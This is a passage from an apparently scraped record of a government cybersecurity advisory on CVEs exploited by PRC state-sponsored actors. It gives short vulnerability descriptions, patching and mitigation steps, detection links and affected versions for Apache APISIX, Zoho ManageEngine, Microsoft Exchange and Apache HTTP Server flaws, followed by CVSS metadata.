versions:\n\n16.1.0-16.1.2\n\n15.1.0-15.1.5\n\n14.1.0-14.1.4\n\n13.1.0-13.1.4\n\n12.1.0-12.1.6\n\n11.6.1-11.6.5 \n \n_Table XVI: Apache CVE-2022-24112_\n\nApache CVE-2022-24112 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nA malicious actor can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. \n \n_Recommended Mitigations_\n\n * In affected versions of Apache APISIX, you can avoid this risk by explicitly commenting out batch-requests in the conf/config.yaml and conf/config-default.yaml files and restarting Apache APISIX.\n * Update to 2.10.4 or 2.12.1. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nApache APISIX between 1.3 and 2.12.1 (excluding 2.12.1)\n\nLTS versions of Apache APISIX between 2.10.0 and 2.10.4 \n \n_Table XVII: ZOHO CVE-2021-40539_\n\nZOHO CVE-2021-40539 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nZoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution. \n \n_Recommended Mitigations_\n\n * Upgrade to latest version. \n \n_Detection Methods_\n\n * Run ManageEngine\u2019s detection tool.\n * Check for specific files and [logs](<https://www.manageengine.com/products/self-service-password/advisory/CVE-2021-40539.html>). \n \n_Vulnerable Technologies and Versions_\n\nZoho Corp ManageEngine ADSelfService Plus \n \n_Table XVIII: Microsoft CVE-2021-26857_\n\nMicrosoft CVE-2021-26857 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: https://github.com/microsoft/CSS-Exchange/tree/main/Security.\n * Hashes can be found here: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_Table XIX: Microsoft CVE-2021-26858_\n\nMicrosoft CVE-2021-26858 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n * Hashes can be found here: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log>. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_Table XX: Microsoft CVE-2021-27065_\n\nMicrosoft CVE-2021-27065 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n * Hashes can be found here: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log>. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_References_\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065> \n \n_Table XXI: Apache CVE-2021-41773_\n\nApache CVE-2021-41773 CVSS 3.0: 7.5 (High) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. A malicious actor could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied,\" these requests can succeed. Enabling CGI scripts for these aliased paths could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 is incomplete (see CVE-2021-42013). \n \n_Recommended Mitigations_\n\n * Apply update or patch. \n \n_Detection Methods_\n\n * Commercially available scanners can detect CVE. \n \n_Vulnerable Technologies and Versions_\n\nApache HTTP Server 2.4.49 and 2.4.50\n\nFedoraproject Fedora 34 and 35\n\nOracle Instantis Enterprise Track 17.1-17.3\n\nNetapp Cloud Backup \n \n### Revisions\n\nInitial Publication: October 6, 2022\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-06T12:00:00", "type": "ics", "title": "Top CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134", "CVE-2023-27350"], "modified": "2022-10-06T12:00:00", "id": "AA22-279A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-279a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}